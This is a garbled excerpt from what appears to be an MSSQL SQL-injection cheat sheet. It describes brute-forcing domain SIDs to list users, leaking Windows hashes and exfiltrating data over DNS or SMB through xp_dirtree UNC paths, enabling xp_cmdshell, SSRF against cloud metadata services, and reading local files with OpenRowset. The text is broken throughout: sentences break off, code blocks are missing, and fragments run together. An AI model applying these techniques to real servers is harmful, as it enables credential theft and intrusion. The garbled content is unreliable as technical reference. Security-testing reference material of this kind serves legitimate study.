master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Administrator'))
: If you know the name of the domain (MEGACORP in this example) this function will return the SID of the user Administrator in hex format. This will look like 0x01050000000[...]0000f401
, note how the last 4 bytes are the number 500 in big endian format, which is the common ID of the user administrator.
This function will allow you to know the ID of the domain (all the bytes except of the last 4).SUSER_SNAME(0x01050000000[...]0000e803)
: This function will return the username of the ID indicated (if any), in this case 0000e803 in big endian == 1000 (usually this is the ID of the first regular user ID created). Then you can imagine that you can bruteforce user IDs from 1000 to 2000 and probably get all the usernames of the users of the domain. For example using a function like the following one:SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
USER_NAME()
:fn_xe_file_target_read_file()
example:fn_get_audit_file()
example:fn_trace_gettable()
example:xp_dirtree
that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests.Invoke-WebRequest
) request. You could do this via the hacker favorite xp_cmdshell
as well.xp_dirtree
, which weirdly is undocumented by Microsoft, which caused it to be documented by other folks on the Internet. This method has been used in multiple examples of Out of Band Data exfiltration posts on the Internet.LOAD_FILE
, you can use xp_dirtree
to make a network request to only TCP port 445. You cannot control the port number, but can read information from network shares. Addtionally, much like any UNC path access, Windows hashes will be sent over to the network that can be captured and replayed for further exploitation.Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
running on a Windows Server 2016 Datacenter
in the default config.master..xp_fileexist
etc. as well that can be used for similar results.xp_cmdshell
spawns a Windows command shell and executes the string passed to it, returning any rows of text. This command is run as the SQL Server service account.xp_cmdshell
is disabled by default. You can enable it using the SQL Server Configuration Option. Here’s howInvoke-WebRequest
to make HTTP requests to perform Server Side queries.Metadata: true
in the case of Azure or the Metadata-Flavor: Google
for GCP.dbo
access so may not work unless the web application connection to the database as sa
or an Administrator role.CREATE ASSEMBLY
query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using select * from sys.trusted_assemblies;
)C:\Windows\win.ini
using the function OpenRowset():sys.dm_exec_requests
and sys.dm_exec_sql_text
: